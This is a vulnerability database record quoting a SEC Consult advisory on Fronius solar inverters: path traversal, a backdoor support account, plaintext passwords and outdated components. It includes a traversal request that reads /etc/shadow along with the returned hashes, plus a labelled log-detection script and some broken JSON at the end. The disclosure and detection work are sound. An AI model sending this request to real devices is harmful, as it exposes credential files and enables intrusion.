VAR-201912-1533
Vulnerability from variot - Updated: 2024-11-23 22:41

admincgi-bin/service.fcgi on Fronius Solar Inverter devices before 3.14.1 (HM 1.12.1) allows action=download&filename= Directory Traversal. The vulnerability stems from a network system or product's failure to properly filter special elements in a resource or file path. An attacker could use this vulnerability to access locations outside the restricted directory.

SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
=======================================================================
title: Multiple vulnerabilities
product: Fronius Solar Inverter Series
vulnerable version: SW Version <3.14.1 (HM 1.12.1)
fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution section below
CVE number: CVE-2019-19228, CVE-2019-19229
impact: High
homepage: https://www.fronius.com
found: 2018-10-31
by: T. Weber (Office Vienna)
    SEC Consult Vulnerability Lab

    An integrated part of SEC Consult
    Europe | Asia | North America

    https://www.sec-consult.com
=======================================================================
Vendor description:
"A passion for new technologies, intensive research and revolutionary solutions have been shaping the Fronius brand since 1945. As the technology leader, we find, develop and implement innovative methods to monitor and control energy for welding technology, photovoltaics and battery charging. We forge new paths, try something difficult and succeed where others have failed in achieving what seems to be impossible. [...]"
Source: http://www.fronius.com/en/about-fronius/company-values
Business recommendation:
The vendor automatically performed a fleet update of the solar inverters in the field in order to patch them. Nevertheless, as not all devices could be reached through such an update, all remaining users are advised to install the patches provided by the vendor immediately.
Vulnerability overview/description:
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to activate an HTTPS web service.

2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This gives access to files of the device's operating system, exposing information such as network configurations, connections to other hosts and potentially other sensitive information.

This vulnerability has been fixed in March 2019 in version 3.12.5 (HM 1.10.5).

The web server runs with "nobody" privileges, but nearly all files on the file system are world-readable and can be extracted.

3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today". This user account has all permissions of all other users ("service", "admin" and "user") together. As its name suggests, the password for the user "today" changes every day and seems to differ between devices with the same firmware. This means that some device-specific strings (e.g. the public device-ID) are mixed up every day to generate a new password. This account is being used by Fronius support in order to access the device upon request from the user.

The fix for this issue has been split into two parts. The "password reset" part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the support account needs an architectural rework which will be fixed in a future version (planned for 3.15.1 (HM 1.15.1)).

The passwords for all users of the web interface are stored in plain-text. This can be seen as another vulnerability and it has been fixed in version 3.14.1 (HM 1.12.1).

4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during a quick examination. Not all of the outdated components can be fixed by the vendor in the current solar inverter generation, see the workaround section below.
Proof of concept:
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a simple way.

2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal vulnerability can be triggered:
http://<IP-Address>/admincgi-bin/service.fcgi

Request to read the "/etc/shadow" password file:
┌──────────────────────────────────────────────────────────────────────────────
|GET /admincgi-bin/service.fcgi?action=download&filename=../../../../../etc/shadow
└──────────────────────────────────────────────────────────────────────────────

As response, the file is returned without line breaks. In this example the line breaks are added for better readability:

┌──────────────────────────────────────────────────────────────────────────────
|HTTP/1.1 200 OK
|Content-Type: application/force-download
|Content-Disposition: attachment; filename=../../../../../etc/shadow
|Connection: close
|Date: Sun, 28 Oct 2018 08:20:27 GMT
|Server: webserver
|
|root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7:::
|nobody:*:10897:0:99999:7:::
|messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7:::
└──────────────────────────────────────────────────────────────────────────────

By retrieving the file "/etc/issue" an easter-egg was found:
┌──────────────────────────────────────────────────────────────────────────────
|[ASCII art banner]
|Congratulations to all non Fronius employees which have come so far :)
└──────────────────────────────────────────────────────────────────────────────
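
Added example (not part of the SEC Consult advisory and not Fronius code): one way to spot the request shown under 2) in web access logs, for instance from a reverse proxy placed in front of the inverter. The combined log format, the sample lines and the file name "report.csv" are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory.
ENDPOINT = "/admincgi-bin/service.fcgi"

# Request line and status code of a combined-format log entry (assumed format).
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so encoded forms of
    the same sequence are compared in one canonical spelling."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(filename):
    """True if filename, read relative to a download directory, leaves it."""
    name = fully_decode(filename).replace("\\", "/")
    if "\x00" in name or name.startswith("/"):
        return True
    # normpath collapses "a/../b"; a ".." that survives at the front means
    # the path climbs above the directory it was supposed to stay in.
    normalized = posixpath.normpath(name)
    return normalized == ".." or normalized.startswith("../")


def classify(line):
    """Return None for unrelated lines, else details of the download request."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if fully_decode(parts.path) != ENDPOINT:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "download" not in params.get("action", []):
        return None
    hits = [fully_decode(n) for n in params.get("filename", []) if escapes_base(n)]
    return {
        "status": int(match.group("status")),
        "traversal": bool(hits),
        "filenames": hits,
    }


def scan(lines):
    """Return (line number, HTTP status, decoded filename) per suspicious request.
    A 200 status means the device answered with file content."""
    alerts = []
    for number, line in enumerate(lines, 1):
        info = classify(line)
        if info and info["traversal"]:
            alerts.append((number, info["status"], info["filenames"][0]))
    return alerts


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2018:08:20:27 +0000] "GET /admincgi-bin/service.fcgi'
    '?action=download&filename=../../../../../etc/shadow HTTP/1.1" 200 512',
    '192.0.2.10 - - [28/Oct/2018:08:21:02 +0000] "GET /admincgi-bin/service.fcgi'
    '?action=download&filename=..%2Fetc%2Fissue HTTP/1.1" 404 0',
    '192.0.2.20 - - [28/Oct/2018:09:00:00 +0000] "GET /admincgi-bin/service.fcgi'
    '?action=download&filename=report.csv HTTP/1.1" 200 2048',
    '192.0.2.20 - - [28/Oct/2018:09:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, status, filename in scan(SAMPLE_LOG):
        print(f"line {number}: status {status}, filename {filename!r}")
```
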
3) Backdoor Account (CVE-2019-19228)
The passwords of the web interface of the affected versions are stored in the file "/tmp/web_users.conf" in clear text:
┌──────────────────────────────────────────────────────────────────────────────
|admin:<user-password>
|service:<user-password>
|today:<40-bit hash-value>
└──────────────────────────────────────────────────────────────────────────────

The password for "today", which is generated by some algorithm, is suspected to be a sha1-hash which includes the system-time. A detailed firmware analysis can reveal the algorithm but has not been performed for this advisory.
4) Outdated and Vulnerable Software Components
By using the path traversal vulnerability (2) a lot of components are found to be outdated:

- Busybox 1.22.1 (December 23, 2014) multiple CVEs
- Lighttpd 1.4.33 (September 27, 2013) multiple CVEs
- Linux kernel 4.1.39 (March 13, 2017) multiple CVEs

The used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012:

- gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1)
- U-Boot 2012.07-3
Vulnerable / tested versions:
The Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar inverters from Fronius share this firmware. The following list has been provided by the vendor:
Symo Hybrid 3.0-3-M
Symo Hybrid 4.0-3-M
Symo Hybrid 5.0-3-M
Datamanager Box 2.0
Symo 3.0-3-M *)
Symo 3.0-3-S *)
Symo 3.7-3-M *)
Symo 3.7-3-S *)
Symo 4.5-3-M *)
Symo 4.5-3-S *)
Symo 5.0-3-M *)
Symo 6.0-3-M *)
Symo 7.0-3-M *)
Symo 8.2-3-M *)
Symo 10.0-3-M *) (tested)
Symo 10.0-3-M-OS *)
Symo 12.5-3-M *)
Symo 15.0-3-M *)
Symo 17.5-3-M *)
Symo 20.0-3-M *)
Galvo 1.5-1 *)
Galvo 2.0-1 *)
Galvo 2.5-1 *)
Galvo 3.0-1 *)
Galvo 3.1-1 *)
Galvo 1.5-1 208-240 *)
Galvo 2.0-1 208-240 *)
Galvo 2.5-1 208-240 *)
Galvo 3.1-1 208-240 *)
Primo 3.0-1 *)
Primo 3.5-1 *)
Primo 3.6-1 *)
Primo 4.0-1 *)
Primo 4.6-1 *)
Primo 5.0-1 *)
Primo 5.0-1 AUS *)
Primo 5.0-1 SC *)
Primo 6.0-1 *)
Primo 8.2-1 *)
Primo 3.8-1 208-240 *)
Primo 5.0-1 208-240 *)
Primo 6.0-1 208-240 *)
Primo 7.6-1 208-240 *)
Primo 8.2-1 208-240 *)
Primo 10.0-1 208-240 *)
Primo 11.4-1 208-240 *)
Primo 12.5-1 208-240 *)
Primo 15.0-1 208-240 *)
Symo 10.0-3 208-240 *)
Symo 10.0-3 480 *)
Symo 12.0-3 208-240 *)
Symo 12.5-3 480 *)
Symo 15.0-3 107 *)
Symo 15.0-3 480 *)
Symo 17.5-3 480 *)
Symo 20.0-3 480 *)
Symo 22.7-3 480 *)
Symo 24.0-3 480 *)
Eco 25.0-3-S *)
Eco 27.0-3-S *)
Symo Advanced 10.0-3 208-240 *)
Symo Advanced 12.0-3 208-240 *)
Symo Advanced 15.0-3 480 *)
Symo Advanced 20.0-3 480 *)
Symo Advanced 22.7-3 480 *)
Symo Advanced 24.0-3 480 *)

*) only with Datamanager card/box
Vendor contact timeline:
2018-11-05: Contacting vendor through contact@fronius.com, requesting security contact
2018-11-06: Vendor replies and confirms security issues
2018-12-03: Meeting with vendor to discuss security issues
2019-01 - 2019-11: Multiple telcos discussing Fronius' rollout plan and fixes
2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability
2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues
2019-08 - 2019-11: Testing & Fleet update to version 3.14.1 (HM 1.12.1)
2019-12-03: Coordinated release of security advisory
Solution:
The vendor provides a patched firmware via their download portal. Visit the download page and search for "firmware update" and choose the "Fronius Solar.update Datamanager V3.14.1-10" firmware.
The new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be downloaded directly as well: https://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip
Some of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed in the current solar inverter product/software generation.
Workaround:
Restrict network access to the device as much as possible and disable port forwarding from the Internet. Fronius Solar.Web access is still possible.
Advisory URL:
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2019
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201912-1533",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "datamanager box 2.0",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "eco 25.0-3-s",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "eco 27.0-3-s",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 1.5-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 1.5-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.0-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.0-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.5-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.5-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.0-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.1-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 11.4-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.6-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 4.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 17.5-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 8.2-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 20.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 3.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 12.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.8-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 17.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 4.5-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 4.6-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 24.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.5-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.1-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.0-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 10.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 12.5-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 20.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.5-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 22.7-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.7-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 6.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 5.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 15.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3-m-os",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 10.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 8.2-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 15.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 22.7-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 6.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.7-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 24.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 20.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 7.6-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3 107",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 5.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 7.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 4.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 sc",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 4.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 aus",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 6.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 8.2-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "solar inverter (hm",
"scope": "lt",
"trust": 0.6,
"vendor": "fronius",
"version": "3.14.11.12.1)"
},
{
"model": "symo advanced 15.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo 8.2-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 20.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 4.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 3.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 10.0-3 208-240",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 5.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 22.7-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 12.0-3 208-240",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 24.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:fronius:datamanager_box_2.0_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:eco_25.0-3-s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:eco_27.0-3-s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_1.5-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_1.5-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.0-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.0-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.5-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.5-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_3.0-1_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber",
"sources": [
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.7
},
"cve": "CVE-2019-19229",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2019-19229",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-45163",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-19229",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-19229",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-19229",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-19229",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-45163",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201912-185",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
The following list has been provided by\nthe vendor:\n\nSymo Hybrid 3.0-3-M\nSymo Hybrid 4.0-3-M\nSymo Hybrid 5.0-3-M\nDatamanager Box 2.0\nSymo 3.0-3-M *)\nSymo 3.0-3-S *)\nSymo 3.7-3-M *)\nSymo 3.7-3-S *)\nSymo 4.5-3-M *)\nSymo 4.5-3-S *)\nSymo 5.0-3-M *)\nSymo 6.0-3-M *)\nSymo 7.0-3-M *)\nSymo 8.2-3-M *)\nSymo 10.0-3-M *) (tested)\nSymo 10.0-3-M-OS *)\nSymo 12.5-3-M *)\nSymo 15.0-3-M *)\nSymo 17.5-3-M *)\nSymo 20.0-3-M *)\nGalvo 1.5-1 *)\nGalvo 2.0-1 *)\nGalvo 2.5-1 *)\nGalvo 3.0-1 *)\nGalvo 3.1-1 *)\nGalvo 1.5-1 208-240 *)\nGalvo 2.0-1 208-240 *)\nGalvo 2.5-1 208-240 *)\nGalvo 3.1-1 208-240 *)\nPrimo 3.0-1 *)\nPrimo 3.5-1 *)\nPrimo 3.6-1 *)\nPrimo 4.0-1 *)\nPrimo 4.6-1 *)\nPrimo 5.0-1 *)\nPrimo 5.0-1 AUS *)\nPrimo 5.0-1 SC *)\nPrimo 6.0-1 *)\nPrimo 8.2-1 *)\nPrimo 3.8-1 208-240 *)\nPrimo 5.0-1 208-240 *)\nPrimo 6.0-1 208-240 *)\nPrimo 7.6-1 208-240 *)\nPrimo 8.2-1 208-240 *)\nPrimo 10.0-1 208-240 *)\nPrimo 11.4-1 208-240 *)\nPrimo 12.5-1 208-240 *)\nPrimo 15.0-1 208-240 *)\nSymo 10.0-3 208-240 *)\nSymo 10.0-3 480 *)\nSymo 12.0-3 208-240 *)\nSymo 12.5-3 480 *)\nSymo 15.0-3 107 *)\nSymo 15.0-3 480 *)\nSymo 17.5-3 480 *)\nSymo 20.0-3 480 *)\nSymo 22.7-3 480 *)\nSymo 24.0-3 480 *)\nEco 25.0-3-S *)\nEco 27.0-3-S *)\nSymo Advanced 10.0-3 208-240 *)\nSymo Advanced 12.0-3 208-240 *)\nSymo Advanced 15.0-3 480 *)\nSymo Advanced 20.0-3 480 *)\nSymo Advanced 22.7-3 480 *)\nSymo Advanced 24.0-3 480 *)\n*) only with Datamanager card/box\n\n\nVendor contact 